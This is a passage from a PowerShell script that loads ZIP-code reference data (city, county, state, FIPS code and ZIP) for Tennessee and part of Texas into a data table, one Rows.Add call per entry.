$Cities.Rows.Add("Moscow","Fayette","Tennessee","TN","47","38057") + $null = $Cities.Rows.Add("Munford","Tipton","Tennessee","TN","47","38058") + $null = $Cities.Rows.Add("Newbern","Dyer","Tennessee","TN","47","38059") + $null = $Cities.Rows.Add("Oakland","Fayette","Tennessee","TN","47","38060") + $null = $Cities.Rows.Add("Pocahontas","Hardeman","Tennessee","TN","47","38061") + $null = $Cities.Rows.Add("Ripley","Lauderdale","Tennessee","TN","47","38063") + $null = $Cities.Rows.Add("Rossville","Fayette","Tennessee","TN","47","38066") + $null = $Cities.Rows.Add("Saulsbury","Hardeman","Tennessee","TN","47","38067") + $null = $Cities.Rows.Add("Somerville","Fayette","Tennessee","TN","47","38068") + $null = $Cities.Rows.Add("Stanton","Haywood","Tennessee","TN","47","38069") + $null = $Cities.Rows.Add("Whiteville","Hardeman","Tennessee","TN","47","38075") + $null = $Cities.Rows.Add("Williston","Fayette","Tennessee","TN","47","38076") + $null = $Cities.Rows.Add("Tiptonville","Lake","Tennessee","TN","47","38079") + $null = $Cities.Rows.Add("Ridgely","Lake","Tennessee","TN","47","38080") + $null = $Cities.Rows.Add("Zcta 380hh","Dyer","Tennessee","TN","47","380HH") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38103") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38104") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38105") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38106") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38107") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38108") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38109") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38111") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38112") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38114") + $null = $Cities.Rows.Add("Hickory hill","Shelby","Tennessee","TN","47","38115") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38116") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38117") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38118") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38119") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38120") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38122") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38125") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38126") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38127") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38128") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38131") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38132") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38133") + $null = $Cities.Rows.Add("Bartlett","Shelby","Tennessee","TN","47","38134") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38135") + $null = $Cities.Rows.Add("Germantown","Shelby","Tennessee","TN","47","38138") + $null = $Cities.Rows.Add("Germantown","Shelby","Tennessee","TN","47","38139") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38141") + $null = $Cities.Rows.Add("Memphis","Shelby","Tennessee","TN","47","38157") + $null = $Cities.Rows.Add("Zcta 381hh","Shelby","Tennessee","TN","47","381HH") + $null = $Cities.Rows.Add("Mc kenzie","Carroll","Tennessee","TN","47","38201") + $null = $Cities.Rows.Add("Atwood","Carroll","Tennessee","TN","47","38220") + $null = $Cities.Rows.Add("Big sandy","Benton","Tennessee","TN","47","38221") + $null = $Cities.Rows.Add("Buchanan","Henry","Tennessee","TN","47","38222") + $null = $Cities.Rows.Add("Cottage grove","Henry","Tennessee","TN","47","38224") + $null = $Cities.Rows.Add("Dresden","Weakley","Tennessee","TN","47","38225") + $null = $Cities.Rows.Add("Dukedom","Weakley","Tennessee","TN","47","38226") + $null = $Cities.Rows.Add("Gleason","Weakley","Tennessee","TN","47","38229") + $null = $Cities.Rows.Add("Greenfield","Weakley","Tennessee","TN","47","38230") + $null = $Cities.Rows.Add("Henry","Henry","Tennessee","TN","47","38231") + $null = $Cities.Rows.Add("Hornbeak","Obion","Tennessee","TN","47","38232") + $null = $Cities.Rows.Add("Kenton","Gibson","Tennessee","TN","47","38233") + $null = $Cities.Rows.Add("Mc lemoresville","Carroll","Tennessee","TN","47","38235") + $null = $Cities.Rows.Add("Mansfield","Henry","Tennessee","TN","47","38236") + $null = $Cities.Rows.Add("Martin","Weakley","Tennessee","TN","47","38237") + $null = $Cities.Rows.Add("Obion","Obion","Tennessee","TN","47","38240") + $null = $Cities.Rows.Add("Palmersville","Weakley","Tennessee","TN","47","38241") + $null = $Cities.Rows.Add("Paris","Henry","Tennessee","TN","47","38242") + $null = $Cities.Rows.Add("Puryear","Henry","Tennessee","TN","47","38251") + $null = $Cities.Rows.Add("Rives","Obion","Tennessee","TN","47","38253") + $null = $Cities.Rows.Add("Sharon","Weakley","Tennessee","TN","47","38255") + $null = $Cities.Rows.Add("Springville","Henry","Tennessee","TN","47","38256") + $null = $Cities.Rows.Add("South fulton","Obion","Tennessee","TN","47","38257") + $null = $Cities.Rows.Add("Trezevant","Carroll","Tennessee","TN","47","38258") + $null = $Cities.Rows.Add("Trimble","Dyer","Tennessee","TN","47","38259") + $null = $Cities.Rows.Add("Troy","Obion","Tennessee","TN","47","38260") + $null = $Cities.Rows.Add("Union city","Obion","Tennessee","TN","47","38261") + $null = $Cities.Rows.Add("Zcta 382hh","Benton","Tennessee","TN","47","382HH") + $null = $Cities.Rows.Add("Jackson","Madison","Tennessee","TN","47","38301") + $null = $Cities.Rows.Add("Jackson","Madison","Tennessee","TN","47","38305") + $null = $Cities.Rows.Add("Adamsville","McNairy","Tennessee","TN","47","38310") + $null = $Cities.Rows.Add("Bath springs","Decatur","Tennessee","TN","47","38311") + $null = $Cities.Rows.Add("Beech bluff","Madison","Tennessee","TN","47","38313") + $null = $Cities.Rows.Add("Bethel springs","McNairy","Tennessee","TN","47","38315") + $null = $Cities.Rows.Add("Bradford","Gibson","Tennessee","TN","47","38316") + $null = $Cities.Rows.Add("Bruceton","Carroll","Tennessee","TN","47","38317") + $null = $Cities.Rows.Add("Buena vista","Carroll","Tennessee","TN","47","38318") + $null = $Cities.Rows.Add("Camden","Benton","Tennessee","TN","47","38320") + $null = $Cities.Rows.Add("Cedar grove","Carroll","Tennessee","TN","47","38321") + $null = $Cities.Rows.Add("Counce","Hardin","Tennessee","TN","47","38326") + $null = $Cities.Rows.Add("Crump","Hardin","Tennessee","TN","47","38327") + $null = $Cities.Rows.Add("Darden","Henderson","Tennessee","TN","47","38328") + $null = $Cities.Rows.Add("Decaturville","Decatur","Tennessee","TN","47","38329") + $null = $Cities.Rows.Add("Dyer","Gibson","Tennessee","TN","47","38330") + $null = $Cities.Rows.Add("Enville","Chester","Tennessee","TN","47","38332") + $null = $Cities.Rows.Add("Eva","Benton","Tennessee","TN","47","38333") + $null = $Cities.Rows.Add("Finger","McNairy","Tennessee","TN","47","38334") + $null = $Cities.Rows.Add("Gadsden","Crockett","Tennessee","TN","47","38337") + $null = $Cities.Rows.Add("Guys","McNairy","Tennessee","TN","47","38339") + $null = $Cities.Rows.Add("Henderson","Chester","Tennessee","TN","47","38340") + $null = $Cities.Rows.Add("Holladay","Benton","Tennessee","TN","47","38341") + $null = $Cities.Rows.Add("Hollow rock","Carroll","Tennessee","TN","47","38342") + $null = $Cities.Rows.Add("Humboldt","Gibson","Tennessee","TN","47","38343") + $null = $Cities.Rows.Add("Huntingdon","Carroll","Tennessee","TN","47","38344") + $null = $Cities.Rows.Add("Huron","Henderson","Tennessee","TN","47","38345") + $null = $Cities.Rows.Add("Jacks creek","Chester","Tennessee","TN","47","38347") + $null = $Cities.Rows.Add("Lavinia","Carroll","Tennessee","TN","47","38348") + $null = $Cities.Rows.Add("Lexington","Henderson","Tennessee","TN","47","38351") + $null = $Cities.Rows.Add("Luray","Chester","Tennessee","TN","47","38352") + $null = $Cities.Rows.Add("Medina","Gibson","Tennessee","TN","47","38355") + $null = $Cities.Rows.Add("Medon","Madison","Tennessee","TN","47","38356") + $null = $Cities.Rows.Add("Michie","McNairy","Tennessee","TN","47","38357") + $null = $Cities.Rows.Add("Milan","Gibson","Tennessee","TN","47","38358") + $null = $Cities.Rows.Add("Milledgeville","McNairy","Tennessee","TN","47","38359") + $null = $Cities.Rows.Add("Morris chapel","Hardin","Tennessee","TN","47","38361") + $null = $Cities.Rows.Add("Oakfield","Madison","Tennessee","TN","47","38362") + $null = $Cities.Rows.Add("Parsons","Decatur","Tennessee","TN","47","38363") + $null = $Cities.Rows.Add("Pinson","Madison","Tennessee","TN","47","38366") + $null = $Cities.Rows.Add("Ramer","McNairy","Tennessee","TN","47","38367") + $null = $Cities.Rows.Add("Reagan","Henderson","Tennessee","TN","47","38368") + $null = $Cities.Rows.Add("Rutherford","Gibson","Tennessee","TN","47","38369") + $null = $Cities.Rows.Add("Saltillo","Hardin","Tennessee","TN","47","38370") + $null = $Cities.Rows.Add("Sardis","Henderson","Tennessee","TN","47","38371") + $null = $Cities.Rows.Add("Savannah","Hardin","Tennessee","TN","47","38372") + $null = $Cities.Rows.Add("Scotts hill","Henderson","Tennessee","TN","47","38374") + $null = $Cities.Rows.Add("Selmer","McNairy","Tennessee","TN","47","38375") + $null = $Cities.Rows.Add("Shiloh","Hardin","Tennessee","TN","47","38376") + $null = $Cities.Rows.Add("Spring creek","Madison","Tennessee","TN","47","38378") + $null = $Cities.Rows.Add("Stantonville","McNairy","Tennessee","TN","47","38379") + $null = $Cities.Rows.Add("Sugar tree","Decatur","Tennessee","TN","47","38380") + $null = $Cities.Rows.Add("Toone","Hardeman","Tennessee","TN","47","38381") + $null = $Cities.Rows.Add("Trenton","Gibson","Tennessee","TN","47","38382") + $null = $Cities.Rows.Add("Westport","Carroll","Tennessee","TN","47","38387") + $null = $Cities.Rows.Add("Wildersville","Henderson","Tennessee","TN","47","38388") + $null = $Cities.Rows.Add("Yuma","Carroll","Tennessee","TN","47","38390") + $null = $Cities.Rows.Add("Denmark","Madison","Tennessee","TN","47","38391") + $null = $Cities.Rows.Add("Mercer","Madison","Tennessee","TN","47","38392") + $null = $Cities.Rows.Add("Zcta 383hh","Benton","Tennessee","TN","47","383HH") + $null = $Cities.Rows.Add("Columbia","Maury","Tennessee","TN","47","38401") + $null = $Cities.Rows.Add("Clifton","Wayne","Tennessee","TN","47","38425") + $null = $Cities.Rows.Add("Ardmore","Giles","Tennessee","TN","47","38449") + $null = $Cities.Rows.Add("Collinwood","Wayne","Tennessee","TN","47","38450") + $null = $Cities.Rows.Add("Culleoka","Maury","Tennessee","TN","47","38451") + $null = $Cities.Rows.Add("Cypress inn","Wayne","Tennessee","TN","47","38452") + $null = $Cities.Rows.Add("Ardmore","Lincoln","Tennessee","TN","47","38453") + $null = $Cities.Rows.Add("Duck river","Hickman","Tennessee","TN","47","38454") + $null = $Cities.Rows.Add("Ethridge","Lawrence","Tennessee","TN","47","38456") + $null = $Cities.Rows.Add("Five points","Lawrence","Tennessee","TN","47","38457") + $null = $Cities.Rows.Add("Frankewing","Lincoln","Tennessee","TN","47","38459") + $null = $Cities.Rows.Add("Goodspring","Giles","Tennessee","TN","47","38460") + $null = $Cities.Rows.Add("Hampshire","Maury","Tennessee","TN","47","38461") + $null = $Cities.Rows.Add("Kimmins","Lewis","Tennessee","TN","47","38462") + $null = $Cities.Rows.Add("Iron city","Wayne","Tennessee","TN","47","38463") + $null = $Cities.Rows.Add("Lawrenceburg","Lawrence","Tennessee","TN","47","38464") + $null = $Cities.Rows.Add("Leoma","Lawrence","Tennessee","TN","47","38468") + $null = $Cities.Rows.Add("Loretto","Lawrence","Tennessee","TN","47","38469") + $null = $Cities.Rows.Add("Lutts","Wayne","Tennessee","TN","47","38471") + $null = $Cities.Rows.Add("Lynnville","Giles","Tennessee","TN","47","38472") + $null = $Cities.Rows.Add("Minor hill","Giles","Tennessee","TN","47","38473") + $null = $Cities.Rows.Add("Mount pleasant","Maury","Tennessee","TN","47","38474") + $null = $Cities.Rows.Add("Olivehill","Hardin","Tennessee","TN","47","38475") + $null = $Cities.Rows.Add("Primm springs","Williamson","Tennessee","TN","47","38476") + $null = $Cities.Rows.Add("Prospect","Giles","Tennessee","TN","47","38477") + $null = $Cities.Rows.Add("Pulaski","Giles","Tennessee","TN","47","38478") + $null = $Cities.Rows.Add("Saint joseph","Lawrence","Tennessee","TN","47","38481") + $null = $Cities.Rows.Add("Santa fe","Maury","Tennessee","TN","47","38482") + $null = $Cities.Rows.Add("Summertown","Lawrence","Tennessee","TN","47","38483") + $null = $Cities.Rows.Add("Waynesboro","Wayne","Tennessee","TN","47","38485") + $null = $Cities.Rows.Add("Westpoint","Lawrence","Tennessee","TN","47","38486") + $null = $Cities.Rows.Add("Williamsport","Maury","Tennessee","TN","47","38487") + $null = $Cities.Rows.Add("Taft","Lincoln","Tennessee","TN","47","38488") + $null = $Cities.Rows.Add("Zcta 384hh","Hardin","Tennessee","TN","47","384HH") + $null = $Cities.Rows.Add("Algood","Putnam","Tennessee","TN","47","38501") + $null = $Cities.Rows.Add("Allardt","Fentress","Tennessee","TN","47","38504") + $null = $Cities.Rows.Add("Zcta 38506","Putnam","Tennessee","TN","47","38506") + $null = $Cities.Rows.Add("Allons","Overton","Tennessee","TN","47","38541") + $null = $Cities.Rows.Add("Allred","Overton","Tennessee","TN","47","38542") + $null = $Cities.Rows.Add("Alpine","Overton","Tennessee","TN","47","38543") + $null = $Cities.Rows.Add("Baxter","Putnam","Tennessee","TN","47","38544") + $null = $Cities.Rows.Add("Bloomington spri","Jackson","Tennessee","TN","47","38545") + $null = $Cities.Rows.Add("Brush creek","Smith","Tennessee","TN","47","38547") + $null = $Cities.Rows.Add("Buffalo valley","Putnam","Tennessee","TN","47","38548") + $null = $Cities.Rows.Add("Byrdstown","Pickett","Tennessee","TN","47","38549") + $null = $Cities.Rows.Add("Celina","Clay","Tennessee","TN","47","38551") + $null = $Cities.Rows.Add("Chestnut mound","Smith","Tennessee","TN","47","38552") + $null = $Cities.Rows.Add("Clarkrange","Fentress","Tennessee","TN","47","38553") + $null = $Cities.Rows.Add("Crawford","Overton","Tennessee","TN","47","38554") + $null = $Cities.Rows.Add("Fairfield glade","Cumberland","Tennessee","TN","47","38555") + $null = $Cities.Rows.Add("Jamestown","Fentress","Tennessee","TN","47","38556") + $null = $Cities.Rows.Add("Zcta 38558","Cumberland","Tennessee","TN","47","38558") + $null = $Cities.Rows.Add("Doyle","White","Tennessee","TN","47","38559") + $null = $Cities.Rows.Add("Elmwood","Smith","Tennessee","TN","47","38560") + $null = $Cities.Rows.Add("Gainesboro","Jackson","Tennessee","TN","47","38562") + $null = $Cities.Rows.Add("Gordonsville","Smith","Tennessee","TN","47","38563") + $null = $Cities.Rows.Add("Granville","Jackson","Tennessee","TN","47","38564") + $null = $Cities.Rows.Add("Grimsley","Fentress","Tennessee","TN","47","38565") + $null = $Cities.Rows.Add("Hickman","Smith","Tennessee","TN","47","38567") + $null = $Cities.Rows.Add("Hilham","Overton","Tennessee","TN","47","38568") + $null = $Cities.Rows.Add("Lancaster","Smith","Tennessee","TN","47","38569") + $null = $Cities.Rows.Add("Livingston","Overton","Tennessee","TN","47","38570") + $null = $Cities.Rows.Add("Monroe","Overton","Tennessee","TN","47","38573") + $null = $Cities.Rows.Add("Monterey","Putnam","Tennessee","TN","47","38574") + $null = $Cities.Rows.Add("Moss","Clay","Tennessee","TN","47","38575") + $null = $Cities.Rows.Add("Pall mall","Pickett","Tennessee","TN","47","38577") + $null = $Cities.Rows.Add("Quebeck","White","Tennessee","TN","47","38579") + $null = $Cities.Rows.Add("Rickman","Overton","Tennessee","TN","47","38580") + $null = $Cities.Rows.Add("Bone cave","Warren","Tennessee","TN","47","38581") + $null = $Cities.Rows.Add("Silver point","Putnam","Tennessee","TN","47","38582") + $null = $Cities.Rows.Add("Ravenscroft","White","Tennessee","TN","47","38583") + $null = $Cities.Rows.Add("Spencer","Van Buren","Tennessee","TN","47","38585") + $null = $Cities.Rows.Add("Walling","White","Tennessee","TN","47","38587") + $null = $Cities.Rows.Add("Whitleyville","Jackson","Tennessee","TN","47","38588") + $null = $Cities.Rows.Add("Wilder","Overton","Tennessee","TN","47","38589") + $null = $Cities.Rows.Add("Zcta 385hh","Clay","Tennessee","TN","47","385HH") + $null = $Cities.Rows.Add("Zcta 385xx","Van Buren","Tennessee","TN","47","385XX") + $null = $Cities.Rows.Add("","Montgomery","Tennessee","TN","47","42223") + $null = $Cities.Rows.Add("","Montgomery","Tennessee","TN","47","422XX") + $null = $Cities.Rows.Add("","Sherman","Texas","TX","48","73949") + $null = $Cities.Rows.Add("Addison","Dallas","Texas","TX","48","75001") + $null = $Cities.Rows.Add("Allen","Collin","Texas","TX","48","75002") + $null = $Cities.Rows.Add("Carrollton","Dallas","Texas","TX","48","75006") + $null = $Cities.Rows.Add("Carrollton","Denton","Texas","TX","48","75007") + $null = $Cities.Rows.Add("Celina","Collin","Texas","TX","48","75009") + $null = $Cities.Rows.Add("Carrollton","Denton","Texas","TX","48","75010") + $null = $Cities.Rows.Add("Zcta 75013","Collin","Texas","TX","48","75013") + $null = $Cities.Rows.Add("Coppell","Dallas","Texas","TX","48","75019") + $null = $Cities.Rows.Add("Denison","Grayson","Texas","TX","48","75020") + $null = $Cities.Rows.Add("Denison","Grayson","Texas","TX","48","75021") + $null = $Cities.Rows.Add("Zcta 75022","Denton","Texas","TX","48","75022") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75023") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75024") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75025") + $null = $Cities.Rows.Add("Flower mound","Denton","Texas","TX","48","75028") + $null = $Cities.Rows.Add("Zcta 75032","Rockwall","Texas","TX","48","75032") + $null = $Cities.Rows.Add("Frisco","Collin","Texas","TX","48","75034") + $null = $Cities.Rows.Add("Zcta 75035","Collin","Texas","TX","48","75035") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75038") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75039") + $null = $Cities.Rows.Add("Garland","Dallas","Texas","TX","48","75040") + $null = $Cities.Rows.Add("Garland","Dallas","Texas","TX","48","75041") + $null = $Cities.Rows.Add("Garland","Dallas","Texas","TX","48","75042") + $null = $Cities.Rows.Add("Garland","Dallas","Texas","TX","48","75043") + $null = $Cities.Rows.Add("Garland","Dallas","Texas","TX","48","75044") + $null = $Cities.Rows.Add("Sachse","Dallas","Texas","TX","48","75048") + $null = $Cities.Rows.Add("Grand prairie","Dallas","Texas","TX","48","75050") + $null = $Cities.Rows.Add("Grand prairie","Dallas","Texas","TX","48","75051") + $null = $Cities.Rows.Add("Grand prairie","Dallas","Texas","TX","48","75052") + $null = $Cities.Rows.Add("The colony","Denton","Texas","TX","48","75056") + $null = $Cities.Rows.Add("Lewisville","Denton","Texas","TX","48","75057") + $null = $Cities.Rows.Add("Gunter","Grayson","Texas","TX","48","75058") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75060") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75061") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75062") + $null = $Cities.Rows.Add("Irving","Dallas","Texas","TX","48","75063") + $null = $Cities.Rows.Add("Lake dallas","Denton","Texas","TX","48","75065") + $null = $Cities.Rows.Add("Highland village","Denton","Texas","TX","48","75067") + $null = $Cities.Rows.Add("Lakewood village","Denton","Texas","TX","48","75068") + $null = $Cities.Rows.Add("Mc kinney","Collin","Texas","TX","48","75069") + $null = $Cities.Rows.Add("Mc kinney","Collin","Texas","TX","48","75070") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75074") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75075") + $null = $Cities.Rows.Add("Pottsboro","Grayson","Texas","TX","48","75076") + $null = $Cities.Rows.Add("Zcta 75077","Denton","Texas","TX","48","75077") + $null = $Cities.Rows.Add("Prosper","Collin","Texas","TX","48","75078") + $null = $Cities.Rows.Add("Richardson","Dallas","Texas","TX","48","75080") + $null = $Cities.Rows.Add("Richardson","Dallas","Texas","TX","48","75081") + $null = $Cities.Rows.Add("Richardson","Collin","Texas","TX","48","75082") + $null = $Cities.Rows.Add("Heath","Rockwall","Texas","TX","48","75087") + $null = $Cities.Rows.Add("Rowlett","Dallas","Texas","TX","48","75088") + $null = $Cities.Rows.Add("Zcta 75089","Dallas","Texas","TX","48","75089") + $null = $Cities.Rows.Add("Sherman","Grayson","Texas","TX","48","75090") + $null = $Cities.Rows.Add("Sherman","Grayson","Texas","TX","48","75092") + $null = $Cities.Rows.Add("Plano","Collin","Texas","TX","48","75093") + $null = $Cities.Rows.Add("Murphy","Collin","Texas","TX","48","75094") + $null = $Cities.Rows.Add("Wylie","Collin","Texas","TX","48","75098") + $null = $Cities.Rows.Add("Zcta 750hh","Collin","Texas","TX","48","750HH") + $null = $Cities.Rows.Add("Bardwell","Ellis","Texas","TX","48","75101") + $null = $Cities.Rows.Add("Barry","Navarro","Texas","TX","48","75102") + $null = $Cities.Rows.Add("Canton","Van Zandt","Texas","TX","48","75103") + $null = $Cities.Rows.Add("Cedar hill","Dallas","Texas","TX","48","75104") + $null = $Cities.Rows.Add("Chatfield","Navarro","Texas","TX","48","75105") + $null = $Cities.Rows.Add("Corsicana","Navarro","Texas","TX","48","75110") + $null = $Cities.Rows.Add("Crandall","Kaufman","Texas","TX","48","75114") + $null = $Cities.Rows.Add("De soto","Dallas","Texas","TX","48","75115") + $null = $Cities.Rows.Add("Duncanville","Dallas","Texas","TX","48","75116") + $null = $Cities.Rows.Add("Edgewood","Van Zandt","Texas","TX","48","75117") + $null = $Cities.Rows.Add("Ennis","Ellis","Texas","TX","48","75119") + $null = $Cities.Rows.Add("Copeville","Collin","Texas","TX","48","75121") + $null = $Cities.Rows.Add("Eustace","Henderson","Texas","TX","48","75124") + $null = $Cities.Rows.Add("Ferris","Ellis","Texas","TX","48","75125") + $null = $Cities.Rows.Add("Forney","Kaufman","Texas","TX","48","75126") + $null = $Cities.Rows.Add("Fruitvale","Van Zandt","Texas","TX","48","75127") + $null = $Cities.Rows.Add("Fate","Rockwall","Texas","TX","48","75132") + $null = $Cities.Rows.Add("Lancaster","Dallas","Texas","TX","48","75134") + $null = $Cities.Rows.Add("Caddo mills","Hunt","Texas","TX","48","75135") + $null = $Cities.Rows.Add("Duncanville","Dallas","Texas","TX","48","75137") + $null = $Cities.Rows.Add("Grand saline","Van Zandt","Texas","TX","48","75140") + $null = $Cities.Rows.Add("Hutchins","Dallas","Texas","TX","48","75141") + $null = $Cities.Rows.Add("Kaufman","Kaufman","Texas","TX","48","75142") + $null = $Cities.Rows.Add("Seven points","Henderson","Texas","TX","48","75143") + $null = $Cities.Rows.Add("Kerens","Navarro","Texas","TX","48","75144") + $null = $Cities.Rows.Add("Lancaster","Dallas","Texas","TX","48","75146") + $null = $Cities.Rows.Add("Gun barrel city","Henderson","Texas","TX","48","75147") + $null = $Cities.Rows.Add("Malakoff","Henderson","Texas","TX","48","75148") + $null = $Cities.Rows.Add("Mesquite","Dallas","Texas","TX","48","75149") + $null = $Cities.Rows.Add("Mesquite","Dallas","Texas","TX","48","75150") + $null = $Cities.Rows.Add("Palmer","Ellis","Texas","TX","48","75152") + $null = $Cities.Rows.Add("Powell","Navarro","Texas","TX","48","75153") + $null = $Cities.Rows.Add("Ovilla","Ellis","Texas","TX","48","75154") + $null = $Cities.Rows.Add("Rice","Navarro","Texas","TX","48","75155") + $null = $Cities.Rows.Add("Scurry","Kaufman","Texas","TX","48","75158") + $null = $Cities.Rows.Add("Seagoville","Dallas","Texas","TX","48","75159") + $null = $Cities.Rows.Add("Terrell","Kaufman","Texas","TX","48","75160") + $null = $Cities.Rows.Add("Zcta 75161","Kaufman","Texas","TX","48","75161") + $null = $Cities.Rows.Add("Trinidad","Henderson","Texas","TX","48","75163") + $null = $Cities.Rows.Add("Josephine","Collin","Texas","TX","48","75164") + $null = $Cities.Rows.Add("Waxahachie","Ellis","Texas","TX","48","75165") + $null = $Cities.Rows.Add("Lavon","Collin","Texas","TX","48","75166") + $null = $Cities.Rows.Add("Zcta 75167","Ellis","Texas","TX","48","75167") + $null = $Cities.Rows.Add("Wills point","Van Zandt","Texas","TX","48","75169") + $null = $Cities.Rows.Add("Wilmer","Dallas","Texas","TX","48","75172") + $null = $Cities.Rows.Add("Nevada","Collin","Texas","TX","48","75173") + $null = $Cities.Rows.Add("Balch springs","Dallas","Texas","TX","48","75180") + $null = $Cities.Rows.Add("Mesquite","Dallas","Texas","TX","48","75181") + $null = $Cities.Rows.Add("Mesquite","Dallas","Texas","TX","48","75182") + $null = $Cities.Rows.Add("Royse city","Rockwall","Texas","TX","48","75189") + $null = $Cities.Rows.Add("Zcta 751hh","Collin","Texas","TX","48","751HH") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75201") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75202") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75203") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75204") + $null = $Cities.Rows.Add("Village","Dallas","Texas","TX","48","75205") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75206") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75207") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75208") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75209") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75210") + $null = $Cities.Rows.Add("Cockrell hill","Dallas","Texas","TX","48","75211") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75212") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75214") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75215") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75216") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75217") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75218") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75219") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75220") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75223") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75224") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75225") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75226") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75227") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75228") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75229") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75230") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75231") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75232") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75233") + $null = $Cities.Rows.Add("Farmers branch","Dallas","Texas","TX","48","75234") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75235") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75236") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75237") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75238") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75240") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75241") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75243") + $null = $Cities.Rows.Add("Farmers branch","Dallas","Texas","TX","48","75244") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75246") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75247") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75248") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75249") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75251") + $null = $Cities.Rows.Add("Dallas","Collin","Texas","TX","48","75252") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75253") + $null = $Cities.Rows.Add("Dallas","Dallas","Texas","TX","48","75270") + $null = $Cities.Rows.Add("Dallas","Collin","Texas","TX","48","75287") + $null = $Cities.Rows.Add("Zcta 752hh","Dallas","Texas","TX","48","752HH") + $null = $Cities.Rows.Add("Greenville","Hunt","Texas","TX","48","75401") + $null = $Cities.Rows.Add("Greenville","Hunt","Texas","TX","48","75402") + $null = $Cities.Rows.Add("Princeton","Collin","Texas","TX","48","75407") + $null = $Cities.Rows.Add("Anna","Collin","Texas","TX","48","75409") + $null = $Cities.Rows.Add("Alba","Wood","Texas","TX","48","75410") + $null = $Cities.Rows.Add("Arthur city","Lamar","Texas","TX","48","75411") + $null = $Cities.Rows.Add("Bagwell","Red River","Texas","TX","48","75412") + $null = $Cities.Rows.Add("Bailey","Fannin","Texas","TX","48","75413") + $null = 